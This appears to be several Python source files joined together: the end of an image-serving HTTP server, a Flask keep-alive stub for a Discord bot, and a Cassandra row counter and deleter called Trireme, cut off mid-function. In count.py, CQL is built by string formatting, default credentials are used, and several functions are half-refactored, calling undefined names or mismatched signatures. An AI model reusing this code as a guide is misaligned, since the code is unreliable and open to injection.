msg = '[{time}] {method}: {url} - {stat}'.format(
time = time.strftime("%H:%M:%S", time.localtime()),
method = connection.header.method,
url = connection.header.url,
stat = '{0}({1})'.format(header.code, HTTPStatus(header.code).phrase)
)
self.log(msg)
header['Content-Length'] = len(content)
if self.allowcros:
header['Access-Control-Allow-Origin'] = '*'
connection.write(header.encode() + b'\r\n\r\n')
connection.write(content)
def response_404(self, connection):
header = HTTPResponseHeader(404)
content = b'404 Not Found'
self.response(connection, header, content)
@staticmethod
def safe_path(path):
path = '/'.join(path.split('\\'))
path = path.split('/')
path = [p for p in path if p not in ['', '..', '.']]
path = '/'.join(path)
return path
def handle_index(self, params):
if 'path' not in params:
return HTTPResponseHeader(404), b'404 Not Found'
directory = params['path']
while '\\' in directory:
directory = directory.replace('\\', '/')
directory = self.safe_path(directory)
disk_directory = os.path.join(self.imgroot, directory)
filenames = []
try:
filenames = os.listdir(disk_directory)
filenames.sort()
except Exception:
pass
response = {"dirs": [], "imgs": []}
for filename in filenames:
full_path = os.path.join(disk_directory, filename)
request_path = '/{0}/{1}'.format(directory, filename)
request_path = '/' + request_path.strip('/\\')
if os.path.isdir(full_path):
response['dirs'].append(request_path)
else:
if filename.split('.')[-1] in self.img_extension:
response['imgs'].append(request_path)
response = json.dumps(response).encode('utf-8')
return HTTPResponseHeader(200), response
def handle_image(self, params):
invalid_request = False
if 'path' not in params:
invalid_request = True
filepath = params['path']
filepath = self.safe_path(filepath)
full_path = os.path.join(self.imgroot, filepath)
if filepath.split('.')[-1] not in self.img_extension:
invalid_request = True
elif not os.path.isfile(full_path):
invalid_request = True
# parse height and width limit.
max_h, max_w = None, None
try:
if 'height' in params:
max_h = int(params['height'])
elif 'width' in params:
max_w = int(params['width'])
except Exception:
invalid_request = True
if invalid_request:
return HTTPResponseHeader(404), b'404 Not Found'
header = HTTPResponseHeader(200)
content = b''
if max_h is not None or max_w is not None:
img = Image.open(full_path)
real_w, real_h = img.size
h_ratio = None
w_ratio = None
if max_h is not None:
h_ratio = max_h / real_h
h_ratio = h_ratio if h_ratio < 1 else 1
if max_w is not None:
w_ratio = max_w / real_w
w_ratio = w_ratio if w_ratio < 1 else 1
max_ratio = 0
if h_ratio is None:
max_ratio = w_ratio
elif w_ratio is None:
max_ratio = h_ratio
else:
max_ratio = h_ratio if h_ratio < w_ratio else w_ratio
new_h, new_w = (real_h * max_ratio, real_w * max_ratio)
img = img.resize((int(new_w), int(new_h)))
img_stream = io.BytesIO()
img = img.save(img_stream, format=self.thumbnail)
content = img_stream.getvalue()
else:
with open(full_path, 'rb') as f:
content = f.read()
return header, content
"""
request_type:
request index: http://domain.com/directory?path=relative/path/to/file
request image: http://domain.com/img?path=relative/path/to/file&height=100px&width=200px
"""
def handle(self, connection):
method = connection.header.method
if method != 'GET':
self.response_404(connection)
return
url = connection.header.url
location, params = self.parse_url(url)
location = location.strip('/\\')
header, content = None, None
loglevel = 0
if location == 'directory':
header, content = self.handle_index(params)
loglevel = 2
elif location == 'img':
header, content = self.handle_image(params)
loglevel = 1
elif location in ['', 'index', 'index.html']:
header = HTTPResponseHeader(200)
content = loadfile(index_path).encode('utf-8')
loglevel = 2
elif location == 'favicon.ico':
if self.icon is not None:
header = HTTPResponseHeader(200)
header['Content-Type'] = 'image/x-icon'
content = self.icon
else:
header = HTTPResponseHeader(404)
content = b''
loglevel = 2
else:
header = HTTPResponseHeader(404)
content = b'Please Do Not Try To Access Non-Image File!'
loglevel = 2
self.response(connection, header, content, loglevel=loglevel)
def str2bool(string):
positive = ['true',
't',
'y',
'yes',
'1',
'correct',
'accept',
'positive'
]
if string.lower() in positive:
return True
else:
return False
if __name__ == '__main__':
import sys
import argparse
import json
args= sys.argv[1:]
parser = argparse.ArgumentParser('HTTPImageServer')
conf_path = 'config.json'
# load default configuration first.
defaults = {
"port": 80,
"interface": "0.0.0.0",
"root": ".",
"thumbnail": "webp",
"cros": True,
"loglevel": 2,
}
config = defaults
if os.path.isfile(conf_path):
with open(conf_path, 'r', encoding='utf-8') as f:
config.update(json.load(f))
else:
with open(conf_path, 'w+', encoding='utf-8') as f:
json.dump(config, f, indent=4, ensure_ascii=False)
parser.add_argument('--port', '-p', type=int, default=None, help='which port to start server on.')
parser.add_argument('--interface', '-i', type=str, default=None, help='which interface to bind, default is 0.0.0.0 for all interface.')
parser.add_argument('--root', '-r', type=str, default=None, help='root directory, default is current directory.')
parser.add_argument('--thumbnail', '-t', type=str, default=None, help='thumbnail format, default is webp, if you have any trouble, change to jpeg.')
parser.add_argument('--cros', type=str2bool, default=None, help='disable cros. default is enabled.')
parser.add_argument('--loglevel', '-l', type=int, default=None, help='loglevel, 0: all information 1: only for response. 2: do not log image file. 3: no log.')
parser.add_argument('--save', default=False, action='store_true', help='save the configuration as default.')
args = parser.parse_args()
parsed = {key:value for key, value in args.__dict__.items() if value is not None}
config.update(parsed)
args.__dict__.update(config)
if args.save:
config.pop('save')
with open(conf_path, 'w+', encoding='utf-8') as f:
json.dump(config, f, indent=4, ensure_ascii=False)
addr = '{0}:{1}'.format(args.interface, args.port)
print('Start HTTP server on {0} and use web root as {1}'.format(addr, args.root))
server = HTTPImageServer(bind_addr=addr, imgroot=args.root, thumbnail=args.thumbnail, allowcros=args.cros, loglevel=args.loglevel, favicon='./favicon.ico')
server.start(back=False)
|
webserver.py
|
from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def home():
return "Webserver OK, Discord Bot OK"
def run():
app.run(host='0.0.0.0',port=8080)
def keep_alive():
t = Thread(target=run)
t.start()
|
count.py
|
#!/usr/bin/env python3
#
# Trireme
#
# Cassandra database row counter and manipulator.
#
# kaspars@fx.lv
#
import argparse
import datetime
import logging
import queue
import sys
import threading
import multiprocessing
import time
import platform
import os
import random
from ssl import SSLContext, PROTOCOL_TLSv1, PROTOCOL_TLSv1_2
from cassandra.auth import PlainTextAuthProvider
from cassandra.cluster import Cluster
from cassandra.policies import DCAwareRoundRobinPolicy
from trireme.datastructures import Result, RowForDeletion, Token_range, Mapper_task, Queues, RuntimeSettings, CassandraSettings, \
CassandraWorkerTask
from trireme.presentation import human_time
# settings
import settings
from trireme.stats import stats_monitor, split_predicter
def parse_user_args():
"""Parse commandline arguments."""
parser = argparse.ArgumentParser()
parser.description = "Trireme - Cassandra row manipulator"
parser.add_argument("action",
type=str,
choices=[
"count-rows", "print-rows", "update-rows",
"delete-rows", "find-nulls", "find-wide-partitions"
],
help="What would you like to do?")
parser.add_argument("host", type=str, help="Cassandra host")
parser.add_argument("keyspace", type=str, help="Keyspace to use")
parser.add_argument("table", type=str, help="Table to use")
parser.add_argument("key", type=str, help="Key to use, when counting rows")
parser.add_argument("--extra-key",
type=str,
dest="extra_key",
help="Extra key, in case of compound primary key.")
parser.add_argument("--update-key",
type=str,
dest="update_key",
help="Update key.")
parser.add_argument("--update-value",
type=str,
dest="update_value",
help="Update value.")
parser.add_argument("--value-column",
type=str,
dest="value_column",
help="Value column.")
parser.add_argument("--filter-string",
type=str,
dest="filter_string",
help="Additional filter string. See docs.")
parser.add_argument("--split",
type=int,
default=18,
help="Split (see documentation)")
parser.add_argument("--workers",
type=int,
default=1,
help="Amount of worker processes to use")
parser.add_argument("--port",
type=int,
default=9042,
help="Cassandra port (9042 by default)")
parser.add_argument("--user",
type=str,
default="cassandra",
help="Cassandra username")
parser.add_argument("--password",
type=str,
default="cassandra",
help="Cassandra password")
parser.add_argument("--datacenter", type=str, default=None, help="Prefer this datacenter and use DCAwareRoundRobinPolicy")
parser.add_argument("--ssl-ca-cert", dest="cacert", type=str, default=None, help="CA cert to use")
parser.add_argument("--ssl-certificate",
dest="ssl_cert",
type=str,
help="SSL certificate to use")
parser.add_argument("--ssl-key",
type=str,
dest="ssl_key",
help="Key for the SSL certificate")
parser.add_argument("--ssl-use-tls-v1",
action="store_true",
dest="ssl_v1",
help="Use TLS1 instead of 1.2")
parser.add_argument("--debug",
action="store_true",
help="Enable DEBUG logging")
parser.add_argument("--min-token", type=int,
help="Min token")
parser.add_argument("--max-token", type=int,
help="Max token")
args = parser.parse_args()
return args
def get_cassandra_session(host,
port,
user,
password,
ssl_cert,
ssl_key,
dc, cacert,
ssl_v1=False):
"""Establish Cassandra connection and return session object."""
auth_provider = PlainTextAuthProvider(username=user, password=password)
py_version = platform.python_version_tuple()
if ssl_cert is None and ssl_key is None:
# skip setting up ssl
ssl_context = None
cluster = Cluster([host],
port=port,
auth_provider=auth_provider)
else:
if ssl_v1:
tls_version = PROTOCOL_TLSv1
else:
tls_version = PROTOCOL_TLSv1_2
if int(py_version[0]) == 3 and int(py_version[1]) > 4:
ssl_context = SSLContext(tls_version)
ssl_context.load_cert_chain(certfile=ssl_cert, keyfile=ssl_key)
if cacert:
ssl_context.load_verify_locations(cacert)
if dc:
cluster = Cluster([host],
port=port, load_balancing_policy=DCAwareRoundRobinPolicy(local_dc=dc),
ssl_context=ssl_context,
auth_provider=auth_provider)
else:
cluster = Cluster([host],
port=port,
ssl_context=ssl_context,
auth_provider=auth_provider)
else:
ssl_options = {'certfile': ssl_cert,
'keyfile': ssl_key,
'ssl_version': PROTOCOL_TLSv1_2}
cluster = Cluster([host],
port=port,
ssl_options=ssl_options,
auth_provider=auth_provider)
try:
session = cluster.connect()
except Exception as e:
print("Exception when connecting to Cassandra: {}".format(e.args[0]))
sys.exit(1)
return session
def find_null_cells(session, keyspace, table, key_column, value_column):
"""Scan table looking for 'Null' values in the specified column.
Finding 'Null' columns in a table.
'key_column' - the column that cotains some meaningful key/id.
Your primary key most likely.
'value_column' - the column where you wish to search for 'Null'
Having 'Null' cells in Cassandra is the same as not having them.
However if you don't control the data model or cannot change it
for whatever reason but still want to know
how many such 'Null' cells you have, you are bit out of luck.
Filtering by 'Null' is not something that you can do in Cassandra.
So what you can do is to query them and look for 'Null' in the result.
"""
# TODO: this is just a stub for now, not fully implemented
session.execute("use {}".format(keyspace))
sql_template = "select {key},{column} from {keyspace}.{table}"
result_list = []
sql = sql_template.format(keyspace=keyspace,
table=table,
key=key_column,
column=value_column)
logging.debug("Executing: {}".format(sql))
result = session.execute(sql)
result_list = [r for r in result if getattr(r, value_column) is None]
def batch_sql_query(sql_statement, key_name, key_list, dry_run=False):
"""Run a query on the specifies list of primary keys."""
for key in key_list:
if isinstance(key, dict):
sql = "{sql_statement} where ".format(sql_statement=sql_statement)
andcount = 0
for k in key:
value = key[k]
if isinstance(value, str):
value = "'{}'".format(value)
sql += "{key_name} = {key}".format(key_name=k, key=value)
if andcount < 1:
andcount += 1
sql += " and "
else:
sql = "{sql_statement} where {key_name} = {key}".format(
sql_statement=sql_statement, key_name=key_name, key=key)
logging.debug("Executing: {}".format(sql))
if dry_run:
logging.info("Would execute: {}".format(sql))
else:
result = session.execute(sql)
logging.debug(result)
time.sleep(0.1)
def execute_statement(sql_statement):
logging.debug("Deleting: {}".format(sql_statement))
result = session.execute(sql_statement)
return result
def process_reaper(process_queue):
max_attempts = 10
current = 0
logging.debug("Process reaper: there are {} processes in the queue".format(process_queue.qsize()))
while process_queue.qsize() > 0:
if current == max_attempts:
logging.debug("Process reaper exiting.")
break
current +=1
process = process_queue.get()
if process.is_alive():
logging.debug("Process {} is still running, putting back into queue".format(process))
process_queue.put(process)
else:
logging.debug("Reaping process {}".format(process))
def batch_executer(cas_settings,batch_q, batch_result_q):
logging.info("STARTING batch executor with batch q size: {}".format(batch_q.qsize()))
s = get_cassandra_session(cas_settings[0],cas_settings[1],cas_settings[2],cas_settings[3],cas_settings[4],cas_settings[5],cas_settings[6])
time.sleep(10)
while batch_q.qsize() >0:
try:
(min, max, sql) = batch_q.get()
logging.info("Executing via BATCH: {}".format(sql))
result = s.execute(sql)
r = Result(min, max, result)
batch_result_q.put(r)
logging.info("Result: {}".format(r))
except Exception as e:
logging.warning(
"Got Cassandra exception: "
"{msg} when running query: {sql}"
.format(sql=sql, msg=e))
def sql_query_q(cas_settings,delete_queue,getter_counter,sql_statement, key_column, result_list, failcount, split_queue,
filter_string, kill_queue, extra_key):
while True:
if kill_queue.qsize() > 0:
logging.warning("Aborting query on request.")
return
if split_queue.qsize() >0:
if delete_queue.qsize() > 2000: # TODO: 2000 should be enough for anyone, right? :)
# slow down with SELECTS if the DELETE queue is already big,
# as there is no point running if DELETE is not keeping up
time.sleep(1)
if extra_key:
sql_base_template = "{sql_statement} where token({key_column}, {extra_key}) " \
">= {min} and token({key_column}, {extra_key}) < {max}"
else:
sql_base_template = "{sql_statement} where token({key_column}) " \
">= {min} and token({key_column}) < {max}"
if filter_string:
sql_base_template += " and {}".format(filter_string)
# prepare query for execution and then based on queue size, either execute within this thread or delegate in a batch to a separate process
if split_queue.qsize() > 1000:
# do the batch approach and get a list of splits from the queue
batch_q = multiprocessing.Queue()
batch_result_q = multiprocessing.Queue()
for i in range(100):
(min, max) = split_queue.get()
sql = sql_base_template.format(sql_statement=sql_statement,
min=min,
max=max,
key_column=key_column, extra_key=extra_key)
batch_q.put((min, max, sql))
p = multiprocessing.Process(target=batch_executer, args=(cas_settings,batch_q, batch_result_q))
p.start()
logging.info("Batch finished: {} / {} ".format(batch_q.qsize(), batch_result_q.qsize()))
else:
# handle query here in the thread
(min, max) = split_queue.get()
sql = sql_base_template.format(sql_statement=sql_statement,
min=min,
max=max,
key_column=key_column, extra_key=extra_key)
try:
if result_list.qsize() % 100 == 0:
logging.debug("Executing: {}".format(sql))
result = session.execute(sql)
getter_counter.put(0)
r = Result(min, max, result)
result_list.put(r)
except Exception as e:
failcount += 1
logging.warning(
"Got Cassandra exception: "
"{msg} when running query: {sql}"
.format(sql=sql, msg=e))
else:
logging.debug("Stopping getter thread due to zero split queue size.")
break
def sql_query(sql_statement, key_column, result_list, failcount, sql_list,
filter_string, kill_queue, extra_key):
while len(sql_list) > 0:
if kill_queue.qsize() > 0:
logging.warning("Aborting query on request.")
return
(min, max) = sql_list.pop()
if extra_key:
sql_base_template = "{sql_statement} where token({key_column}, {extra_key}) " \
">= {min} and token({key_column}, {extra_key}) < {max}"
else:
sql_base_template = "{sql_statement} where token({key_column}) " \
">= {min} and token({key_column}) < {max}"
if filter_string:
sql_base_template += " and {}".format(filter_string)
sql = sql_base_template.format(sql_statement=sql_statement,
min=min,
max=max,
key_column=key_column, extra_key=extra_key)
try:
if result_list.qsize() % 100 == 0:
logging.debug("Executing: {}".format(sql))
result = session.execute(sql)
r = Result(min, max, result)
result_list.put(r)
except Exception as e:
failcount += 1
logging.warning(
"Got Cassandra exception: "
"{msg} when running query: {sql}"
.format(sql=sql, msg=e))
def splitter(queues, rsettings):
tr = rsettings.tr
i = tr.min
predicted_split_count = split_predicter(tr, rsettings.split)
logging.info("Preparing splits with split size {}".format(rsettings.split))
logging.info("Predicted split count is {} splits".format(predicted_split_count))
splitcounter = 0
while i <= tr.max - 1:
if queues.split_queue.full():
logging.debug("There are {} splits prepared. Pausing for a second.".format(splitcounter))
time.sleep(0.5)
else:
i_max = i + pow(10, rsettings.split)
if i_max > tr.max:
i_max = tr.max # don't go higher than max_token
queues.split_queue.put((i, i_max))
queues.stats_queue_splits.put(0)
splitcounter+=1
i = i_max
# kill pill for split queue, signaling that we are done
queues.split_queue.put(False)
logging.debug("Splitter is done. All splits created")
def distributed_sql_query(sql_statement, cas_settings, queues, rsettings):
start_time = datetime.datetime.now()
result_list = result_queue
failcount = 0
thread_count = 1
kill_queue = queue.Queue() # TODO: change this to an event?
backoff_counter = 0
tm = None
try:
while True:
if split_queue.qsize() >0:
if backoff_counter >0:
backoff_counter =0 # reset backoff counter
if get_process_queue.qsize() < thread_count:
thread = threading.Thread(
target=sql_query_q,
args=(cas_settings,delete_queue,getter_counter,sql_statement, key_column, result_list, failcount,
split_queue, filter_string, kill_queue, extra_key))
thread.start()
logging.info("Started thread {}".format(thread))
get_process_queue.put(thread)
else:
logging.info("Max process count reached")
logging.info("{} more queries remaining".format(split_queue.qsize()))
res_count = result_list.qsize()
logging.info("{} results so far".format(res_count))
n = datetime.datetime.now()
delta = n - start_time
elapsed_time = delta.total_seconds()
logging.info("Elapsed time: {}.".format(
human_time(elapsed_time)))
if res_count > 0:
result_per_sec = res_count / elapsed_time
logging.info("{} results / s".format(result_per_sec))
time.sleep(10)
else:
backoff_counter += 1
logging.debug("No splits in the split queue. Will sleep {} sec".format(backoff_counter))
time.sleep(backoff_counter)
process_reaper(get_process_queue)
except KeyboardInterrupt:
logging.warning("Ctrl+c pressed, asking all threads to stop.")
kill_queue.put(0)
time.sleep(2)
logging.info("{} more queries remaining".format(split_queue.qsize()))
logging.info("{} results so far".format(res_count))
if failcount > 0:
logging.warning(
"There were {} failures during the query.".format(failcount))
return result_list
def threaded_reductor(input_queue, output_queue):
"""Do the reduce part of map/reduce and return a list of rows."""
backoff_timer = 0
while True:
if input_queue.qsize() == 0:
backoff_timer+=1
logging.debug("No results to reduce, reducer waiting for {} sec".format(backoff_timer))
time.sleep(backoff_timer)
else:
if backoff_timer >0:
backoff_timer = 0
result = input_queue.get()
for row in result.value:
# for deletion, we want to be token range aware, so we pass token range information as well
rd = RowForDeletion(result.min, result.max, row)
output_queue.put(rd)
def delete_preparer(delete_preparer_queue, delete_queue, keyspace, table, key, extra_key):
sql_template = "delete from {keyspace}.{table}"
sql_statement = sql_template.format(keyspace=keyspace, table=table)
backoff_timer=0
while True:
if delete_preparer_queue.qsize() == 0:
backoff_timer+=1
logging.debug("Delete preparer sleeping for {} sec".format(backoff_timer))
time.sleep(backoff_timer)
else:
if backoff_timer > 0:
backoff_timer = 0 #reset backoff timer
# get item from queue
row_to_prepare_with_tokens = delete_preparer_queue.get()
row_to_prepare = row_to_prepare_with_tokens.row
prepared_dictionary = {}
prepared_dictionary[key] = getattr(row_to_prepare, key)
prepared_dictionary[extra_key] = getattr(row_to_prepare, extra_key)
token_min = "token({key},{extra_key}) >= {token_min}".format(key=key, extra_key=extra_key,token_min=row_to_prepare_with_tokens.min)
token_max = "token({key},{extra_key}) < {token_max}".format(key=key, extra_key=extra_key,token_max=row_to_prepare_with_tokens.max)
sql = "{sql_statement} where {token_min} and {token_max} and ".format(sql_statement=sql_statement, token_min=token_min, token_max=token_max)
#
#
andcount = 0
for rkey in prepared_dictionary:
value = prepared_dictionary[rkey]
# cassandra is timezone aware, however the response that we would have received
# previously does not contain timezone, so we need to add it manually
if isinstance(value, datetime.datetime):
value = value.replace(tzinfo=datetime.timezone.utc)
value = "'{}'".format(value)
sql += "{key_name} = {qkey}".format(key_name=rkey, qkey=value)
if andcount < 1:
andcount += 1
sql += " and "
delete_queue.put(sql)
def delete_rows(queues, rsettings):
for row in get_rows(queues, rsettings):
sql_template = "delete from {keyspace}.{table} where token({key},{extra_key}) >= {min} and token({key},{extra_key}) < {max} and {key} = '{value}' and {extra_key} = '{extra_value}'"
sql_statement = sql_template.format(keyspace=rsettings.keyspace, table=rsettings.table, key=rsettings.key, extra_key=rsettings.extra_key, min=row.min, max=row.max, value=row.value.get(rsettings.key), extra_value=utc_time(row.value.get(rsettings.extra_key)))
t = CassandraWorkerTask(sql_statement, (row.min, row.max))
t.task_type = "delete" # used for statistics purpose only
queues.worker_queue.put(t)
queues.stats_queue_delete_scheduled.put(0)
def update_rows(session,
keyspace,
table,
key,
update_key,
update_value,
split,
filter_string,
extra_key=None):
"""Update specified rows by setting 'update_key' to 'update_value'.
When Updating rows in Cassandra you can't filter by token range.
So what we do is find all the primary keys for the rows that
we would like to update, and then run an update in a for loop.
"""
session.execute("use {}".format(keyspace))
rows = get_rows(session, keyspace, table, key, split, update_key,
filter_string, extra_key)
update_list = []
for row in rows:
if extra_key:
update_list.append({
key: getattr(row, key),
extra_key: getattr(row, extra_key)
}) # use tuple of key, extra_key
else:
update_list.append(getattr(row, key))
logging.info("Updating {} rows".format(len(update_list)))
logging.info(
"Updating rows and setting {update_key} to new value "
"{update_value} where filtering string is: {filter_string}"
.format(update_key=update_key,
update_value=update_value,
filter_string=filter_string))
# surround update value with quotes in case it is a string,
# but don't do it if it looks like a string
# but in reality is meant to be a a boolean
booleans = ["true", "false"]
if isinstance(update_value, str):
if update_value.lower() not in booleans:
update_value = "'{}'".format(update_value)
sql_template = "update {keyspace}.{table} set "\
"{update_key} = {update_value}"
sql_statement = sql_template.format(keyspace=keyspace,
table=table,
update_key=update_key,
update_value=update_value)
logging.info(sql_statement)
while True:
response = input(
"Are you sure you want to continue? (y/n)").lower().strip()
if response == "y":
break
elif response == "n":
logging.warning("Aborting upon user request")
return 1
result = batch_sql_query(sql_statement, key, update_list, False)
logging.info("Operation complete.")
def get_rows(queues, rsettings):
"""Generator that returns rows as we get them from worker"""
sql_template = "select * from {keyspace}.{table}"
sql_statement = sql_template.format(keyspace=rsettings.keyspace, table=rsettings.table)
mt = Mapper_task(sql_statement, rsettings.key, rsettings.filter_string)
mt.parser = get_result_parser
queues.mapper_queue.put(mt)
while True:
if queues.results_queue.empty():
logging.debug("Waiting on results...")
time.sleep(5)
else:
yield queues.results_queue.get()
queues.stats_queue_results_consumed.put(0)
def get_rows_count(queues, rsettings):
sql_template = "select count(*) from {keyspace}.{table}"
sql_statement = sql_template.format(keyspace=rsettings.keyspace, table=rsettings.table)
count = 0
aggregate = True
mt = Mapper_task(sql_statement, rsettings.key, rsettings.filter_string)
mt.parser = count_result_parser;
queues.mapper_queue.put(mt)
total = 0
while True:
if queues.results_queue.empty():
logging.debug("Waiting on results...")
logging.debug("Total so far: {}".format(total))
time.sleep(5)
else:
res = queues.results_queue.get()
if res is False:
# kill pill received
# end the loop and present the results
break
queues.stats_queue_results_consumed.put(0)
total += res.value
# send kill signal to process manager to stop all workers
queues.kill.set()
time.sleep(4) # wait for the kill event to reach all processes
return total
# now, chill and wait for results
#
#
# this was needed for wide partition finder, the count per partition
#
#
# unaggregated_count = []
# while result.qsize() > 0:
# r = result.get()
# if aggregate:
# count += r.value[0].count
# else:
# split_count = Result(r.min, r.max, r.value[0])
# unaggregated_count.append(split_count)
# if aggregate:
# return count
# else:
# return unaggregated_count
def print_rows(queues, rsettings):
for row in get_rows(queues, rsettings):
print(row)
def find_wide_partitions(session,
keyspace,
table,
key,
split,
value_column=None,
filter_string=None):
# select count(*) from everywhere, record all the split sizes
# get back a list of dictionaries [ {'min': 123, 'max',124, 'count':1 } ]
# sort it by 'count' and show top 5 or something
# get rows count, but don't aggregate
count = get_rows_count(session, keyspace, table, key, split, filter_string,
False)
# now we have count of rows per split, let's sort it
count.sort(key=lambda x: x.value, reverse=True)
# now that we know the most highly loaded splits, we can drill down
most_loaded_split = count[0]
token_range = Token_range(most_loaded_split.min, most_loaded_split.max)
most_loaded_split_count = get_rows_count(session,
keyspace,
table,
key,
split=14,
filter_string=None,
aggregate=False,
token_range=token_range)
most_loaded_split_count.sort(key=lambda x: x.value, reverse=True)
token_range = Token_range(most_loaded_split_count[0].min,
most_loaded_split_count[0].max)
most_loaded_split_count2 = get_rows_count(session,
keyspace,
table,
key,
split=12,
filter_string=None,
aggregate=False,
token_range=token_range)
most_loaded_split_count2.sort(key=lambda x: x.value, reverse=True)
token_range = Token_range(most_loaded_split_count2[0].min,
most_loaded_split_count2[0].max)
most_loaded_split_count3 = get_rows_count(session,
keyspace,
table,
key,
split=10,
filter_string=None,
aggregate=False,
token_range=token_range)
most_loaded_split_count3.sort(key=lambda x: x.value, reverse=True)
# narrow it down to 100 million split size
token_range = Token_range(most_loaded_split_count3[0].min,
most_loaded_split_count3[0].max)
most_loaded_split_count4 = get_rows_count(session,
keyspace,
table,
key,
split=8,
filter_string=None,
aggregate=False,
token_range=token_range)
most_loaded_split_count4.sort(key=lambda x: x.value, reverse=True)
# narrow it down to 1 million split size
token_range = Token_range(most_loaded_split_count4[0].min,
most_loaded_split_count4[0].max)
most_loaded_split_count5 = get_rows_count(session,
keyspace,
table,
key,
split=6,
filter_string=None,
aggregate=False,
token_range=token_range)
most_loaded_split_count5.sort(key=lambda x: x.value, reverse=True)
# narrow it down to 1 thousand split size
token_range = Token_range(most_loaded_split_count5[0].min,
most_loaded_split_count5[0].max)
most_loaded_split_count6 = get_rows_count(session,
keyspace,
table,
key,
split=3,
filter_string=None,
aggregate=False,
token_range=token_range)
most_loaded_split_count6.sort(key=lambda x: x.value, reverse=True)
# narrow it down to 10 split size
token_range = Token_range(most_loaded_split_count6[0].min,
most_loaded_split_count6[0].max)
most_loaded_split_count7 = get_rows_count(session,
keyspace,
table,
key,
split=1,
filter_string=None,
aggregate=False,
token_range=token_range)
most_loaded_split_count7.sort(key=lambda x: x.value, reverse=True)
print(most_loaded_split)
print(most_loaded_split_count[0])
print(most_loaded_split_count2[0])
print(most_loaded_split_count3[0])
print(most_loaded_split_count4[0]) # 100 million precision
print(most_loaded_split_count5[0]) # 1 million precision
print(most_loaded_split_count6[0]) # 1 thousand precision
print(most_loaded_split_count7[0]) # 10 precision
# .......
def print_rows_count(queues, rsettings):
count = get_rows_count(queues, rsettings)
print("Total amount of rows in {keyspace}.{table} is {count}".format(
keyspace=rsettings.keyspace, table=rsettings.table, count=count))
def queue_monitor(queues, rsettings):
while not queues.kill.is_set():
logging.debug("Queue status:")
logging.debug("Split queue full: {} empty: {}".format(queues.split_queue.full(), queues.split_queue.empty()))
logging.debug("Map queue full: {} empty: {}".format(queues.mapper_queue.full(), queues.mapper_queue.empty()))
logging.debug("Worker queue full: {} empty: {}".format(queues.worker_queue.full(), queues.worker_queue.empty()))
logging.debug("Results queue full: {} empty: {}".format(queues.results_queue.full(), queues.results_queue.empty()))
time.sleep(5)
else:
logging.debug("Queue monitor exiting.")
def process_manager(queues, rsettings):
# queue monitor
qmon_process = multiprocessing.Process(target=queue_monitor, args=(queues, rsettings))
qmon_process.start()
# stats monitor
smon_process = multiprocessing.Process(target=stats_monitor, args=(queues, rsettings))
smon_process.start()
# start splitter
splitter_process = multiprocessing.Process(target=splitter, args=(queues, rsettings))
splitter_process.start()
# mapper
mapper_process = multiprocessing.Process(target=mapper, args=(queues,rsettings))
mapper_process.start()
# TODO: remove this, as reducer is not used
# reducer
#reducer_process = multiprocessing.Process(target=reducer, args=(queues,rsettings))
#reducer_process.start()
workers = []
for w in range(rsettings.workers):
# workers
worker_process = multiprocessing.Process(target=cassandra_worker, args=(queues,rsettings))
worker_process.start()
workers.append(worker_process)
while not queues.kill.is_set():
for w in workers:
if not w.is_alive():
logging.warning("Process {} died.".format(w))
workers.remove(w)
time.sleep(1)
logging.warning("Starting a new process")
worker_process = multiprocessing.Process(target=cassandra_worker, args=(queues, rsettings))
worker_process.start()
workers.append(worker_process)
time.sleep(1)
else:
logging.debug("Global kill event! Process manager is stopping.")
def reducer2(queues, rsettings):
"""Filter out the relevant information from Cassandra results"""
pid = os.getpid()
print("Reducer started")
while True:
# wait for work
if queues.reducer_queue.empty():
logging.debug("Reducer {} waiting for work".format(pid))
time.sleep(2)
else:
result = queues.reducer_queue.get()
logging.debug("Got task {} from reducer queue".format(result))
for row in result.value:
queues.results_queue.put(row)
def utc_time(value):
if isinstance(value, datetime.datetime):
value = value.replace(tzinfo=datetime.timezone.utc)
return value
def count_result_parser(row, rsettings=None):
return row.count
def get_result_parser(row, rsettings=None):
results_that_we_care_about = {}
results_that_we_care_about[rsettings.key] = getattr(row, rsettings.key)
results_that_we_care_about[rsettings.extra_key] = getattr(row, rsettings.extra_key)
return results_that_we_care_about
def cassandra_worker(queues, rsettings):
"""Executes SQL statements and puts results in result queue"""
cas_settings = rsettings.cas_settings
pid = os.getpid()
if "," in cas_settings.host:
host = random.choice(cas_settings.host.split(","))
logging.info("Picking random host: {}".format(host))
else:
host = cas_settings.host
# starting bunch of sessions at the same time might not be idea, so we add
# a bit of random delay
if rsettings.worker_max_delay_on_startup > 0:
time.sleep(random.choice(range(rsettings.worker_max_delay_on_startup)))
session = get_cassandra_session(host, cas_settings.port, cas_settings.user,
cas_settings.password, cas_settings.ssl_cert, cas_settings.ssl_key, cas_settings.dc, cas_settings.cacert,
cas_settings.ssl_v1 )
sql = "use {}".format(rsettings.keyspace)
logging.debug("Executing SQL: {}".format(sql))
session.execute(sql)
if not session.is_shutdown:
logging.debug("Worker {} connected to Cassandra.".format(pid))
while not queues.kill.is_set():
# wait for work
if queues.worker_queue.empty():
logging.debug("Worker {} waiting for work".format(pid))
time.sleep(2)
else:
task = queues.worker_queue.get()
if task is False:
# kill pill received
# pass it to the results queue
queues.results_queue.put(False)
continue # and return back to waiting for work
logging.debug("Got task {} from worker queue".format(task))
try:
r = session.execute(task.sql)
except:
logging.warning("Cassandra connection issues!")
return False
if task.task_type == "delete":
queues.stats_queue_deleted.put(0)
logging.debug("DELETE: {}".format(task.sql))
else:
for row in r:
logging.debug(row)
if task.parser:
row = task.parser(row, rsettings)
res = Result(task.split_min, task.split_max, row)
logging.debug(res)
queues.results_queue.put(res)
queues.stats_queue_results.put(0)
else:
logging.debug("Worker stopping due to kill event.")
def mapper(queues, rsettings):
"""Prepares SQL statements for worker and puts tasks in worker queue"""
try:
map_task = queues.mapper_queue.get(True,10) # initially, wait for 5 sec to receive first work orders
except:
logging.warning("Mapper did not receive any work...timed out.")
return False
print("mapper Received work assignment::: {}".format(map_task.sql_statement))
while True:
if queues.split_queue.empty():
logging.debug("Split queue empty. Mapper is waiting")
time.sleep(1)
else:
split = queues.split_queue.get()
if split is False:
# this is a kill pill, no more work, let's relax
logging.debug("Mapper has received kill pill, passing it on to workers and exiting.")
queues.worker_queue.put(False) # pass the kill pill
return True
if rsettings.extra_key:
sql = "{statement} where token({key}, {extra_key}) >= {min} and token({key}, {extra_key}) < {max}".format(statement=map_task.sql_statement, key=map_task.key_column, extra_key=rsettings.extra_key, min=split[0], max=split[1])
else:
